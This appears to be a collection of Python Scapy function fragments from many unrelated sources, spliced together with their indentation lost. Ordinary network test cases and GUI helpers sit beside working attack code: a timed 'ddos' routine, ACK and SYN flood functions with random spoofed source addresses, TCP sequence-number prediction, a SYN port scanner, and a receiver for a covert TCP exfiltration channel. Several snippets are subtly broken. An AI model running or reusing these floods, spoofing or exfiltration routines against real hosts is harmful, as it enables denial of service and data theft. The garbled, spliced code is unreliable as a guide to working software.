def ddos (attack_time, target_ip):
nomHote= socket.gethostname()
source_ip = socket.gethostbyname(nomHote)
source_port = 90
now = datetime.now
temps_actuel = now.strftime("%Y/%m/%d %H:%M%S")
if temps_actuel == attack_time:
for d in range(0, 100):
IP1 = IP(source_IP=source_ip, destination = target_ip)
TCP1 = TCP(srcport=source_port, dstport = 80)
pkt = IP1 / TCP1
send(pkt, inter=.002)
print("\npaquet num ", d, " / 100 envoye ")
def verify_tcp_checksum(self):
self.vapi.cli("test http server")
p = self.params[socket.AF_INET]
config_tun_params(p, self.encryption_type, self.tun_if)
send = (Ether(src=self.tun_if.remote_mac, dst=self.tun_if.local_mac) /
p.scapy_tun_sa.encrypt(IP(src=p.remote_tun_if_host,
dst=self.tun_if.local_ip4) /
TCP(flags='S', dport=80)))
self.logger.debug(ppp("Sending packet:", send))
recv = self.send_and_expect(self.tun_if, [send], self.tun_if)
recv = recv[0]
decrypted = p.vpp_tun_sa.decrypt(recv[IP])
self.assert_packet_checksums_valid(decrypted)
def handshake_validation(mac, ip):
sport = random.randint(1024, 65535)
ip = IP(src=source_ip, dst=ip)
syn = TCP(sport=sport, dport=443, flags='S', seq=1000)
syn_ack = srp1(ip / syn, timeout=0.5, verbose=False)
if syn_ack:
validated_mac = syn_ack[0].src
if mac == validated_mac:
return False
else:
return True
return True
def sendpkt(self, pkt, response):
etherLayer = Ether(src=get_if_hwaddr(self.interface),
dst=pkt[Ether].src)
ipLayer = IP(src=pkt[IP].dst, dst=pkt[IP].src)
tcpLayer = TCP(sport=pkt[TCP].dport,
dport=pkt[TCP].sport,
ack=pkt[TCP].seq + 1,
seq=pkt[TCP].ack,
flags="FA")
newpkt = etherLayer / ipLayer / tcpLayer / response
sendp(newpkt, verbose=0, iface=self.interface)
def test_tcp_checksum(self):
""" verify checksum correctness for vpp generated packets """
self.vapi.cli("test http server")
p = self.params[socket.AF_INET]
vpp_tun_sa, scapy_tun_sa = self.configure_sa_tun(p)
send = (Ether(src=self.tun_if.remote_mac, dst=self.tun_if.local_mac) /
scapy_tun_sa.encrypt(
IP(src=p.remote_tun_if_host, dst=self.tun_if.local_ip4) /
TCP(flags='S', dport=80)))
self.logger.debug(ppp("Sending packet:", send))
recv = self.send_and_expect(self.tun_if, [send], self.tun_if)
recv = recv[0]
decrypted = vpp_tun_sa.decrypt(recv[IP])
self.assert_packet_checksums_valid(decrypted)
def ack_flood(dst_ip, dst_port, one_work_num):
for i in range(one_work_num):
# IPlayer
srcIP = random_ip()
IPlayer = IP(src=srcIP, dst=dst_ip)
# TCPlayer
srcPort = randomPort()
TCPlayer = TCP(sport=srcPort,
dport=int(dst_port),
flags="A",
ack=random.randint(1, 4000000000))
# 发送包
ack_packet = IPlayer / TCPlayer
send(ack_packet)
def calTSN(tgt):
seqNum = 0
preNum = 0
diffSeq = 0
for x in range(1, 5):
if preNum != 0:
preNum = seqNum
pkt = IP(dst=tgt) / TCP()
ans = sr1(pkt, verbose=0)
seqNum = ans.getlayer(TCP).seq
diffSeq = seqNum - preNum
print '[+] TCP Seq Difference: ' + str(diffSeq)
return seqNum + diffSeq
def __init__(self):
super(MainWindow, self).__init__()
# Set up the user interface from Designer.
self.setupUi(self)
self.current_packet = Ether() / IP() / TCP() # TODO: move to function
self.current_if_list = get_if_list()
self.LoadNetworkInterfaces()
self.SetConnections()
#self.optionsIpLabel.setHidden(True)#TODO
#self.optionsIpLineEdit.setHidden(True)#TODO
self.show()
def trans_data(target_ip, target_port, data):
#先建立TCP连接
start_tcp(target_ip=target_ip, target_port=target_port)
#print sport,s_seq,d_seq
#发起GET请求
ans = sr1(
IP(dst=target_ip) /
TCP(dport=target_port, sport=sport, seq=s_seq, ack=d_seq, flags=24) /
data,
verbose=False)
#ans.show()
#读取服务端发来的数据
rcv = ans[Raw]
print(rcv)
def run(self):
i = 0
print("Thread {} started".format(self.id))
ip_data = IP(src=self.source, dst=self.target)
time_start = time.time()
while True:
src_port = RandNum(1024, 65535)
syn = TCP(sport=src_port, dport=self.port, flags="S")
send(ip_data / syn, verbose=False, iface=self.interface)
i += 1
if i % 1000 == 0:
print("Thread {} sent {} packets, speed: {} pkts".format(
self.id, i, 1000 / (time.time() - time_start)))
time_start = time.time()
def make_a_list(list2, sequ):
packetlist = []
for place in list2:
deport = random.randint(1000, 65535)
wat = IP(dst=IPE) / TCP(dport=deport, seq=sequ)
print sequ
sequ += len(place)
packetlist.append(wat)
random.shuffle(packetlist)
# packet_help = packetlist[:len(packetlist)-1]
for place2 in packetlist:
ThreeWayHandshake(place2[TCP].dport)
send(place2)
return packetlist
def __init__(self):
self.ip_list = self.tcp_list = self.eth_list = []
self.ip_list = [field.name for field in IP().fields_desc]
self.tcp_list = [field.name for field in TCP().fields_desc]
self.eth_list = [field.name for field in Ether().fields_desc]
self.udp_list = [field.name for field in UDP().fields_desc]
try:
self.ip_list.remove("options")
self.tcp_list.remove("options")
self.eth_list.remove("options")
self.udp_list.remove["options"]
except:
pass
self.tot_col = self.eth_list + self.ip_list + ["time"] + self.tcp_list
def analyze(packet):
src= packet.getlayer(1).src
ip = IP(dst=src)
tcp = packet.getlayer(2)
ack = Ether() / ip / TCP(sport=tcp.dport, dport=tcp.sport, seq=tcp.fields['ack'], ack=tcp.fields['seq'] + 1)
print(str(ack))
jobid = tcp.sport
packet_index = tcp.seq
raw = packet.lastlayer()
data = raw.fields['load']
if packet_index == 0:
app_exfiltrate.register_file(jobid, data)
flags = "SA"
elif data[0:5] == 'DONE:':
app_exfiltrate.retrieve_file(jobid, data[5:])
return
else:
flags = "A"
app_exfiltrate.retrieve_data(jobid, packet_index, data)
ack = Ether() / ip / TCP(sport=tcp.dport, dport=tcp.sport, seq=tcp.seq, flags=flags, ack=tcp.seq + 1)
sendp(ack)
def assemble_probe(fwd_label_list, tmy_label_list):
probe_pkt = Ether() / IP() / TCP(dport=PORT_FWD)
fwd_len = len(fwd_label_list)
probe_pkt = probe_pkt / FWD_header(label_cnt=fwd_len)
for outport in fwd_label_list:
probe_pkt = probe_pkt / FWD_label(outport=outport)
tmy_len = len(tmy_label_list)
probe_pkt = probe_pkt / TMY_header(label_cnt=tmy_len)
for switch_id, bitmap in tmy_label_list:
probe_pkt = probe_pkt / TMY_label(switch_id=switch_id, bitmap=bitmap)
return probe_pkt
def main():
my_packet = sniff(count=1,
filter='tcp and tcp.flags.syn==1 and tcp.flags.ack==0'
) # should add another filter
port = my_packet[TCP][0].dport
if my_packet:
new_packet = IP(dst='0.0.0.0') / TCP(
dport=port, seq=random.randint(0, 10000), flags='SA')
got = sr1(new_packet, timeout=0.8)
if got:
my_packet = sniff(count=1,
filter='tcp') # should add another filter
while my_packet: # ##
pass
def _l4_hdr(self):
if self.stream.l4 is not None:
l4_header = self.stream.l4.__dict__
proto = self.stream.get_l4_proto()
if proto == 'tcp':
return TCP(**l4_header)
elif proto == 'udp':
return UDP(**l4_header)
elif proto == 'icmp':
return ICMP(**l4_header)
elif proto == 'icmpv6':
return ICMPv6EchoRequest()
else:
log.error("Unsupported L4 protocol %s." % proto)
def send_and_verify_ip4(self, src_pg, dst_pg, mss, expected_mss):
# IPv4 TCP packet with the requested MSS option.
# from a host on src_pg to a host on dst_pg.
p = (Ether(dst=src_pg.local_mac, src=src_pg.remote_mac) /
IP(src=src_pg.remote_ip4, dst=dst_pg.remote_ip4) /
TCP(sport=1234,
dport=1234,
flags="S",
options=[('MSS', (mss)), ('EOL', None)]) / Raw('\xa5' * 100))
rxs = self.send_and_expect(src_pg, p * 65, dst_pg)
for rx in rxs:
self.verify_pkt(rx, expected_mss)
def build_query(self, conf):
"""Method used to build the packet to send
TCP test need to validate any kind of TCP packet so let's use TCP SYN
:conf: the namespace configuration
:returns: packet to send
"""
pkt = Ether(src=conf['mac_local'], dst=conf['mac_nh'])
pkt /= IP(src=conf['ip_priv'], dst=conf['ip_rmt'], id=RandShort())
pkt /= TCP(sport=RandShort(), dport=RandShort(), flags='S')
pkt /= self._payload
return fragment(pkt.__class__(str(pkt)))
def run(self):
# There are two different ways you can go about pulling this off.
# You can either:
# - 1. Just open a socket to your target on any old port
# - 2. Or you can be a cool kid and use scapy to make it look cool, and overcomplicated!
#
# (Uncomment whichever method you'd like to use)
# Method 1 -
s = socket.socket()
s.connect((target, port))
# Methods 2 -
i = IP()
i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(
1, 254), random.randint(1, 254), random.randint(1, 254))
i.dst = target
t = TCP()
t.sport = random.randint(1, 65535)
t.dport = port
t.flags = 'S'
send(i / t, verbose=0)
def test_start_two_ipv4_tcp_attacks(self):
"""
Tests to ensure that two IPv4 UDP attacks have been triggered
:return:
"""
pkt1 = (Ether(src='00:00:00:00:01:01', dst=self.dst_mac) / IP(
dst=self.dst_ipv4, src=self.src_ipv4, proto=consts.UDP_PROTO) /
UdpInt() / IntShim(length=9, next_proto=consts.TCP_PROTO) /
IntHeader(meta_len=1) / IntMeta1(switch_id=3) /
IntMeta2(switch_id=2) /
SourceIntMeta(switch_id=1, orig_mac=self.orig_mac) /
TCP(dport=self.dport, sport=self.sport) /
'hello transparent-security')
pkt2 = (Ether(src='00:00:00:00:01:01', dst=self.dst_mac) / IP(
dst=self.dst_ipv4, src=self.src_ipv4, proto=consts.UDP_PROTO) /
UdpInt() / IntShim(length=9, next_proto=consts.TCP_PROTO) /
IntHeader(meta_len=1) / IntMeta1(switch_id=3) /
IntMeta2(switch_id=2) /
SourceIntMeta(switch_id=1, orig_mac=self.orig_mac) /
TCP(dport=self.dport, sport=self.sport) /
'hello transparent-security')
for index in range(0, self.ae.packet_count):
logger.info('Iteration #%s', index)
ret_val1 = self.ae.process_packet(pkt1)
ret_val2 = self.ae.process_packet(pkt2)
logger.info('Checking index - [%s] - count - [%s]', index,
self.ae.packet_count)
if index * 2 < self.ae.packet_count:
logger.info('Expecting false - [%s]', ret_val1)
self.assertFalse(ret_val1)
self.assertFalse(ret_val2)
else:
logger.info('Expecting true - [%s]', ret_val1)
self.assertTrue(ret_val1)
self.assertTrue(ret_val2)
def test_simple_list(self):
packet = (Ether(dst="ff:ff:ff:ff:ff:ff", src="00:00:00:00:00:00") /
IP(src="0.0.0.0", dst="127.0.0.1") / TCP())
packet_result = [
{
"Ethernet": {
"src": "00:00:00:00:00:00",
"dst": "ff:ff:ff:ff:ff:ff",
"type": 2048,
}
},
{
"IP": {
"frag": 0,
"src": "0.0.0.0",
"proto": 6,
"tos": 0,
"dst": "127.0.0.1",
"chksum": None,
"len": None,
"options": [],
"version": 4,
"flags": None,
"ihl": None,
"ttl": 64,
"id": 1,
}
},
{
"TCP": {
"reserved": 0,
"seq": 0,
"ack": 0,
"dataofs": None,
"urgptr": 0,
"window": 8192,
"flags": None,
"chksum": None,
"dport": 80,
"sport": 20,
"options": [],
}
},
]
to_list_result = to_list(packet)
self.assertTrue(isinstance(to_list_result, list))
self.assertEqual(to_list_result, packet_result)
def send_tcp_syn_pkts (dumb,extra_ports,burst_time):
logging.warning("In function : send_tcp_syn_pkts")
print ("In function : send_tcp_syn_pkts")
# try:
i =0
burst_val =0
curr_vlan = int(addr_base)
port_curr_hostip = int(start_host_ip)
while (i< int(port_count)):
j=0
while(j<int(hosts_per_port)):
curr_mac = get_mac(l2_addr_prefix,port_curr_hostip)
curr_ip = get_ip(l3_addr_prefix,port_curr_hostip,curr_vlan)
#seq_num=RandInt().max
seq_num=random.randint(1000,45000)
if host_info.has_key(curr_ip):
SOURCE = host_info[curr_ip]['sport']
SOURCE = int(extra_ports)
if SOURCE > 65530:
SOURCE =2
if False:
print curr_mac
print curr_ip
print seq_num
print SOURCE
print dst_mac
print d_port
print TARGET_IP
if True:
if ((str(connection_type) == "plainbgp") or (str(connection_type) == "plainbgp")):
tcp_syn=Ether(dst=dst_mac,src=curr_mac)/IP(dst=TARGET_IP,src=curr_ip)/TCP(sport=int(SOURCE),dport=int(d_port),seq=seq_num,ack=0)
else:
tcp_syn=Ether(dst=dst_mac,src=curr_mac)/Dot1Q(vlan=curr_vlan)/IP(dst=TARGET_IP,src=curr_ip)/TCP(sport=int(SOURCE),dport=int(d_port),seq=seq_num,ack=0)
if (curr_mac != "ff:ff:ff:ff:ff:ff"):
host_info[curr_ip]['seq']=seq_num+1
host_info[curr_ip]['ack']=0
sendp(tcp_syn,iface=str(interface))
host_info[curr_ip]['lastpkt']=tcp_syn
burst_val = burst_val + 1
Syn_Host[curr_ip] = Syn_Host[curr_ip] + 1
if (int(burst_val) > int(MAX_BURST)):
burst_val = 0
#sleep(float(BURST_TIMER))
sleep(float(burst_time))
port_curr_hostip = int(port_curr_hostip) + 1
j = j + 1
curr_vlan = curr_vlan + 1
i = i+1
def TCP_SYN_port_scan(dict, ports):
"""
dict: a dictionary generated from the function arp_scan. type dictionary
ports: the port(s) or range of ports to scan. type int, tuple or list
"""
hosts = dict
# scan the hosts for open TCP ports as listed in the provided dictionaty
for host in hosts:
# Stuck the Layer 3 header and the TCP payload
tcp_packet = IP(dst=host) / TCP(dport=ports, flags="S")
# send the TCP package for all ports and collect all answers
answered, unanswered = sr(tcp_packet, timeout=2, verbose=False)
# for each of the answers received,
for answer in answered:
# if the answer is "SYN AKN" or 0x12 in hex,
# append the port to the results dictionary as open
if answer[1][TCP].flags == 0x12:
hosts[host]["ports"][answer[1][TCP].sport] = "open"
# send a TCP reset flag to terminate the connection
send(IP(dst=host) /
TCP(dport=answer[1][TCP].sport, flags="R"), verbose=False)
# if the answer is "RESET" append the port to the results dictionary as closed
elif answer[1][TCP].flags == 0x14:
hosts[host]["ports"][answer[1][TCP].sport] = "closed"
else:
if answer.haslayer(ICMP):
if int(answer.getlayer(ICMP).type) == 3 and\
int(answer.getlayer(ICMP).code) in [1, 2, 3, 9, 10, 13]:
hosts[host]["ports"][answer[1]
[ICMP].sport] = "filtered"
# for each of the unanswersed ports received, add them to the results as filtered
for not_answer in unanswered:
hosts[host]["ports"][not_answer[1][TCP].dport] = "filtered"
return hosts
def create_stream_encrypted(self, src_mac, dst_mac, src_ip, dst_ip, sa):
return [
# TCP
Ether(src=src_mac, dst=dst_mac) / sa.encrypt(
IP(src=src_ip, dst=dst_ip) /
TCP(dport=self.tcp_port_out, sport=20)),
# UDP
Ether(src=src_mac, dst=dst_mac) / sa.encrypt(
IP(src=src_ip, dst=dst_ip) /
UDP(dport=self.udp_port_out, sport=20)),
# ICMP
Ether(src=src_mac, dst=dst_mac) / sa.encrypt(
IP(src=src_ip, dst=dst_ip) /
ICMP(id=self.icmp_id_out, type='echo-request'))
]
def test_simple_dict(self):
packet = (Ether(dst="ff:ff:ff:ff:ff:ff", src="00:00:00:00:00:00") /
IP(src="0.0.0.0", dst="127.0.0.1") / TCP())
packet_result = {
"Ethernet": {
"src": "00:00:00:00:00:00",
"dst": "ff:ff:ff:ff:ff:ff",
"type": 2048,
}
}
to_dict_result = to_dict(packet)
self.assertTrue(isinstance(to_dict_result, dict))
self.assertEqual(to_dict_result, packet_result)
def _SetWindow(self):
if self.windowCheckbox.isChecked() is True:
self.windowLineEdit.setEnabled(False)
tmp_pkt_eth = Ether()
tmp_pkt_ip = IP()
# This depends on chosen packet type
tmp_pkt_transp = TCP(dataofs=self._current_data_offset_or_len)
tmp_pkt_raw = Raw(load=self._current_load)
tmp_pkt = tmp_pkt_eth / tmp_pkt_ip / tmp_pkt_transp / tmp_pkt_raw
tmp_pkt = tmp_pkt.__class__(raw(tmp_pkt)) # LOL hacked
self.windowLineEdit.setText(str(tmp_pkt.window))
self._current_window = tmp_pkt.window
self._SetHeaderChecksum()
else:
self.windowLineEdit.setEnabled(True)
def send_winning_packet(packet, sourceip):
res_ip = IP(dst=sourceip, flags="DF")
res_data = "HTTP/1.1 200 OK\r\n\
Date: Thu, 1 Jan 2000 01:01:01 GMT\r\n\
Server: Apache/2.4.10 (Win32) OpenSSL/0.9.8zb PHP/5.3.29\r\n\
Content-Length: 10\r\n\
Content-Type: text/html\r\n\r\n\
congratz! the flag is: " + challenge_flag
res_tcp = TCP(flags="SA",
sport=80,
dport=packet['TCP'].sport,
seq=1,
ack=1234567890)
send(res_ip / res_tcp / res_data, verbose=False)
users[sourceip] = User()
def create_stream_plain(self, src_mac, dst_mac, src_ip, dst_ip):
return [
# TCP
Ether(src=src_mac, dst=dst_mac) /
IP(src=src_ip, dst=dst_ip) /
TCP(sport=self.tcp_port_in, dport=20),
# UDP
Ether(src=src_mac, dst=dst_mac) /
IP(src=src_ip, dst=dst_ip) /
UDP(sport=self.udp_port_in, dport=20),
# ICMP
Ether(src=src_mac, dst=dst_mac) /
IP(src=src_ip, dst=dst_ip) /
ICMP(id=self.icmp_id_in, type='echo-request')
]
def cal_TSN(tgt):
seq_num = 0
pre_num = 0
diff_seq = 0
for x in range(1, 5):
if pre_num:
pre_num = seq_num
pkt = IP(dst=tgt) / TCP()
ans = sr1(pkt, verbose=0)
seq_num = ans.getlayer(TCP).seq
diff_seq = seq_num - pre_num
print(f'[+] Diferencia en la sequencia TCP: {str(diff_seq)}')
return seq_num + diff_seq
def syn_443(host, queue=None):
try:
ans, uans = sr(IP(dst=host) / TCP(dport=443, flags="S"),
timeout=5,
verbose=False)
if len(ans) > 0:
ip = ans[0][1].fields['src']
if queue is None:
print(ip, ' is up')
return ip
else:
print(ip, ' is up')
queue.put(ip)
except Exception as e:
pass
